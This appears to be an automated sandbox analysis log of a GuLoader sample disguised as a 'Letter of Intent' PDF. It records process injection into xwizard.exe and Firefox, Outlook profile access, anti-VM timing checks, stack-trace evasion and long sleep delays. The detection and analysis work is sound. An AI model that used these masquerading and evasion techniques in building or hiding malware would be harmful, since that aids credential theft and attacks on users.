            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: mshtml.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ybjXXpYwhPHZD.exe, 00000005.00000002.3107024135.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000002.3106981368.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: xwizard.pdbGCTL source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: Process Memory Space: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe PID: 6876, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.1950807727.0000000004D63000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F61368 push eax; iretd 2_2_32F61369
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F6225F pushad ; ret 2_2_32F627F9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F627FA pushad ; ret 2_2_32F627F9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F6283D push eax; iretd 2_2_32F62858
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F909AD push ecx; mov dword ptr [esp], ecx2_2_32F909B6
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_05503F5D push ss; retf 5_2_05503F76
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FAF90 push eax; retf 5_2_054FAF91
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055017A0 push BD1E4A2Bh; ret 5_2_055017A7
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_05505E22 push edi; ret 5_2_05505E3F
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055086FA push ds; retf 5_2_05508735
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055086E5 push ds; retf 5_2_05508735
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_0550C94D push edi; retf 5_2_0550C951
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055059AD push cs; retf 5_2_055059AE
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_05507050 push ss; iretd 5_2_05507053
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_054FF8B8 push 79675D9Eh; retf 5_2_054FF8BE
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_05500390 push ds; ret 5_2_05500391
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeCode function: 5_2_055002AC push es; retf 5_2_055002AE
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047627FA pushad ; ret 6_2_047627F9
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0476225F pushad ; ret 6_2_047627F9
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_0476283D push eax; iretd 6_2_04762858
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_047909AD push ecx; mov dword ptr [esp], ecx6_2_047909B6
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B785E push ds; retf 6_2_028B783B
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B6156 push ss; iretd 6_2_028B6159
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028BC64F push eax; ret 6_2_028BC651
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B4AB3 push cs; retf 6_2_028B4AB4
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B08A6 push BD1E4A2Bh; ret 6_2_028B08AD
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028AE9BE push 79675D9Eh; retf 6_2_028AE9C4
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028C0E11 push ebx; iretd 6_2_028C0E13
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028B4F28 push edi; ret 6_2_028B4F45
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028AF3B2 push es; retf 6_2_028AF3B4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile created: \letter of intent (loi) for the company november 2024 pdf.pif.exe
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile created: \letter of intent (loi) for the company november 2024 pdf.pif.exeJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeFile created: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeAPI/Special instruction interceptor: Address: 5181585
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeAPI/Special instruction interceptor: Address: 25E1585
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeRDTSC instruction interceptor: First address: 514548E second address: 514548E instructions: 0x00000000 rdtsc 0x00000002 test edx, eax 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F257CDBEE2Ah 0x00000008 test ch, 00000007h 0x0000000b cmp di, AE34h 0x00000010 inc ebp 0x00000011 cmp ax, bx 0x00000014 inc ebx 0x00000015 cmp bx, ax 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeRDTSC instruction interceptor: First address: 25A548E second address: 25A548E instructions: 0x00000000 rdtsc 0x00000002 test edx, eax 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F257C72A55Ah 0x00000008 test ch, 00000007h 0x0000000b cmp di, AE34h 0x00000010 inc ebp 0x00000011 cmp ax, bx 0x00000014 inc ebx 0x00000015 cmp bx, ax 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D1C0 rdtsc 2_2_3300D1C0
            Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 1172Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 8800Jump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\xwizard.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244Thread sleep count: 1172 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244Thread sleep time: -2344000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244Thread sleep count: 8800 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244Thread sleep time: -17600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe TID: 6900Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028BC840 FindFirstFileW,FindNextFileW,FindClose,6_2_028BC840
            Source: firefox.exe, 00000009.00000002.2641912515.000002A39C5DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
